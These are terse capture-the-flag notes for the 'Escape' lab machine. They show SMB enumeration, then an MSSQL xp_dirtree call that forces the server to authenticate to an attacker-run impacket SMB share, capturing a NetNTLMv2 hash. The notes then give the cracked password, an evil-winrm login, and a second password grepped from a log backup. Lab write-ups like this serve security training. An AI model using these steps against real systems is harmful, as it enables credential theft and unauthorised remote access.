Escape
MSSQL | NTLMv2 | Leaking Certificate |
Last updated
MSSQL | NTLMv2 | Leaking Certificate |
Last updated
nmap -A -Pn -T5 10.10.11.202 > escape.txt
smbclient -N -L 10.10.11.202
smbclient -N //10.10.11.202/Public
xp_dirtree '\10.10.14.111\fg0x0'
impacket-smbserver fg0x0 . -smb2support
sql_svc::sequel:aaaaaaaaaaaaaaaa:a67d3a6c2bc61d49438f83e8cb850d79:010100000000000080be93d2de50d901c497e13ee4bcfbb30000000001001000440063004b0064004a0053005500490003001000440063004b0064004a00530055004900020010006400470049007700520064004400530004001000640047004900770052006400440053000700080080be93d2de50d90106000400020000000800300030000000000000000000000000300000f26169eb30bf0eac34d3f6ff79ec092da66f9ebba85a0e852ac070ebeec4957d0a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310034002e003100310031000000000000000000
cracked password:
REGGIE1234ronnie
( sql_svc )
evil-winrm -i 10.10.11.202 -u sql_svc -p REGGIE1234ronnie
Select-String "Password" ERRORLOG.BAK
Username:
Ryan.Cooper
Password:
NuclearMosquito3